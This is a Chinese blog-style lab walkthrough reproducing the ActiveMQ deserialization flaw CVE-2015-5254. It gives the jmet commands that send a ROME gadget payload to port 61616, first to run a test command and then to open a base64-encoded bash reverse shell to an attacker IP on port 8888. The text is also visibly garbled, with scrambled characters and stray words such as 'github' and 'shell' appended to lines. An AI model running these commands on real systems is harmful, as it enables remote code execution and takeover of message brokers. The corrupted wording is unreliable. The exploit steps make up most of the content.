ActiveMQ反序列化漏洞(CVE-2015-5254)复现

简介: Apache ActiveMQ是Apache软件基金会所研发的一套开源的消息中间件,它支持Java消息服务,集群,Spring Framework等。Apache ActiveMQ 5.13.0以前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程***者可借助特制的序列化的Java消息服务(JMS)ObjectMessage对象利用该漏洞执行任意代码。


1.首先在kali里面执行如下命令:java

cd var/opt  

wget https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar

mkdir external

在这里插入图片描述

2.输入:git

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/sucess" -Yp ROME 192.168.199.120 61616github


注释:-Q指定队列消息名,-I指定JMS客户端,这里是ActiveMQ,-Y指定具体的命令,-Yp指定payload类型,其后分别是ActiveMQ所在机器的ip及工做端口web


在这里插入图片描述

3.如今会给目标的ActiveMQ添加一个名为事件的队列,能够咱们经过http://192.168.199.120:8161/admin/browse.jsp?JMSDestination=event看到这个队列中全部消息
在这里插入图片描述
4.点击消息可触发命令执行
在这里插入图片描述
5.而后使用反弹shell的命令输入:
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -c {echo,YmFzaCAtaSA+Ji9kZXYvdGNwLzE5Mi4xNjguMTk5LjEwOS84ODg4IDA+JjE=}|{base64,-d}|{bash,-i}" -Yp ROME 192.168.199.120 61616shell

前面是输入本身的IP后进行的编码 后面是输入被***者的IP安全

在这里插入图片描述

在这里插入图片描述
6.执行完之后会出现一个序号 而后再主页里面触发 在进行监听就能够了
在这里插入图片描述bash